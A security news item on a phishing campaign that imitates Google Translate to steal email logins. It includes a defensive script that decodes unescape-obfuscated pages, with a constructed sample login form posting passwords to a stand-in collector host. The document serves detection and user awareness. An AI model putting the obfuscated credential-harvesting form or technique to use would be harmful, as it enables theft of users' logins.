Google Translate spoofed for credential harvesting.
Oct 13, 2022

Bogus Google Translate lookalike pages are being used in a credential theft campaign.

Researchers at Avanan describe phishing emails that are impersonating Google Translate in order to steal users’ email credentials. The emails inform users that they have pending incoming emails, and they’ll need to confirm their account within 48 hours in order to receive the emails. If the user clicks the link in the emails, they’ll be taken to a phony Google Translate page with a login field. 

“In the background, you can see the HTML that goes into turning this site into a Google Translate lookalike,” the researchers state. “One of the JavaScript commands they use is the unescape function. This is a classic command that helps obfuscate the true meaning of the page. Further, when decoding the JavaScript, you’ll see that the security service would see a bunch of gibberish.”
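A scanner that only pattern-matches the raw page sees percent-encoded text, which is why the `unescape` wrapper works as obfuscation. The following sketch is an added example, not code from Avanan or from the campaign: it decodes `unescape()` string literals as data, without executing the page, and reports a login form that only appears after decoding. The sample page, the `collector.example` host and all function names are constructed for illustration.

```javascript
// Added example: static triage only. Nothing from the page is executed;
// string literals passed to unescape() are decoded as data and inspected.
const CALL_RE =
  /\bunescape\s*\(\s*(["'])((?:\\.|(?!\1)[^\\])*)\1\s*\)/g;

// Decode %XX and %uXXXX in one pass, as legacy unescape() does, without eval.
function decodePercent(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi,
    (_, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

// Peel nested layers: decoded text may itself contain another unescape() call.
function extractHiddenLayers(html, maxDepth = 5) {
  const layers = [];
  let queue = [html];
  for (let depth = 1; depth <= maxDepth && queue.length; depth++) {
    const next = [];
    for (const text of queue) {
      for (const m of text.matchAll(CALL_RE)) {
        const decoded = decodePercent(m[2]);
        layers.push({ depth, decoded });
        next.push(decoded);
      }
    }
    queue = next;
  }
  return layers;
}

// Flag markup that only becomes visible after decoding.
function triage(html) {
  const layers = extractHiddenLayers(html);
  const hidden = layers.map(l => l.decoded).join("\n");
  const findings = [];
  if (layers.length) findings.push("unescape-obfuscation");
  if (/<input[^>]+type\s*=\s*["']?password/i.test(hidden)) findings.push("hidden-password-field");
  if (/<form[^>]+action\s*=/i.test(hidden)) findings.push("hidden-form-action");
  return { layers: layers.length, findings };
}

// Constructed sample (not taken from the campaign): a login form, percent-encoded.
const enc = s => [...s].map(c => "%" + c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
const INNER = '<form action="https://collector.example/post"><input type="password" name="p"></form>';
const SAMPLE = `<html><script>document.write(unescape("${enc(INNER)}"));</script></html>`;

console.log(triage(SAMPLE));
```

The same decode-then-inspect pass can run in a mail gateway or sandbox before a linked page is scored, so the password field is evaluated in its decoded form.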

The phishing page looks fairly convincing, but users should note that its URL looks very suspicious, even though it ends with “translate[.]goog.”

Avanan offers the following advice to help users avoid falling for phishing scams:

  • “Always hover over URLs to ensure the destination is legitimate
  • “Be sure to pay attention to grammar, spelling and factual inconsistencies within an email
  • “If ever unsure about an email, ask the original sender”